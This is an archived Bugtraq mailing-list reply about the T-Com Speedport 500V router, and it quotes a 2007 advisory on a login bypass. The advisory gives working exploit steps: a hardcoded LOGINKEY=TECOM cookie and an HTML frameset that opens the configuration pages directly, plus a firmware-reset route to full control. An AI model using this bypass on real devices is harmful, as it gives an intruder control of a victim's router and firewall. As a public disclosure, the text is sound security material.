lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Mon, 22 Jan 2007 13:35:12 +0100
From: "security@...pot.de" <security@...pot.de>
Cc: bugtraq@...urityfocus.com
Subject: Re: Virginity Security Advisory 2007-001 : T-Com Speedport 500V Login
 bypass

Since this is not the first security problem on this router, and 
Deutsche Telekom really does not care,
I advice everyone to use alternative means of routing / dialing up. The 
modem shipped in conjunction with
this router requires VLAN support. Dialup requests will only be served 
on VLAN.7

More information can be found on man-wiki, althought it deals with the 
700V, which has the same security problems, it also applies to the 500V 
version.
<a 
href="http://man-wiki.net/index.php/T-Home_IPTV_without_speedport_W_700V">man-wiki</a> 
and
<a 
href="http://man-wiki.net/index.php/T-Home_IPTV_over_wireless_bridge">man-wiki</a> 


On Linux a "vconfig add eth0 7" will allow you to dial up without the 
Speedport 500V

Regards,
<a href="http://www.mohammadkhani.eu/">Amir Mohammadkhani</a>



advisory07@...p.ru schrieb:
> - - - --------------------------------------------------------------------
> Virginity Security Advisory 2007-001
> - - - --------------------------------------------------------------------
>              DATE : 2007-01-19 15:32 GMT
>              TYPE : remote
> VERSIONS AFFECTED : T-Com Speedport 500V Firmware 1.31
>            AUTHOR : Virginity
>   ADVISORY NUMBER : 005
> - - - --------------------------------------------------------------------
>
>
> Description:
>
> The Speedport 500V is a broadband-router which is sold in germany along
> with ADSL lines. (just so you know)
>
> The system is stupid and verifies wether you have entered the correct
> password by setting a cookie with the content LOGINKEY=TECOM
> (this is hardcoded and can not be changed)
> If an attacker simply creates this cookie he can bypass password 
> authentication by simply calling the configuration html sites directly.
>
> The attacker then has nearly full system access (you cannot change the
> system password without knowing the old one) and can change system
> configuration e.g. disable the firewall. You can also perform a firmware
> upgrade, which allows you to reset the password to the default one, which
> now gives you full system access.
>
> Vendor has not been notified. I don't think they care^^.
>
> - - - --------------------------------------------------------------------
>
>
> Example:
>
> Create a cookie like this:
>
> Name: LOGINKEY
> Content: TECOM
> Host: <ipaddress> <- replace this by your routers ipaddress ;)
> Path: /
> Expires: Never
>
> create a html page like this and open it in your browser:
>
> <html>
> <frameset rows="44,*" border=0 frameborder=0 framespacing=0">
> <frame src="http://<ipaddress>/b_banner.htm" name="banner">  
> <frameset cols="170,*" border=0 frameborder=0 framespacing=0>
> <frame src="http://<ipaddress>/m_startseite.htm" name="menu">
> <frame src="http://<ipaddress>/hcti_startseite.htm" name="hcti">  
> </frameset>
> </frameset>
> </html>
>
> this will bypass the login screen and lead you directly to configuration 
> menu.
>
> - - - --------------------------------------------------------------------
>
>
> Workaround:
>
> Download the Sourcecode from the vendor (GPL), replace TECOM with something
> else, try bulding it, and then try installing it on the hardware.
> i did not try this. its stupid and does not really solve the problem.
>
> - - - --------------------------------------------------------------------
>
>
> Personal note:
>
> Still here... sadly not dead yet. maybe i should hack the NSA so they kill
> me? *lol* guess i'd have to learn some real things.... greetz to s.
> and that other admin.
>
> - - - --------------------------------------------------------------------
>   

Powered by blists - more mailing lists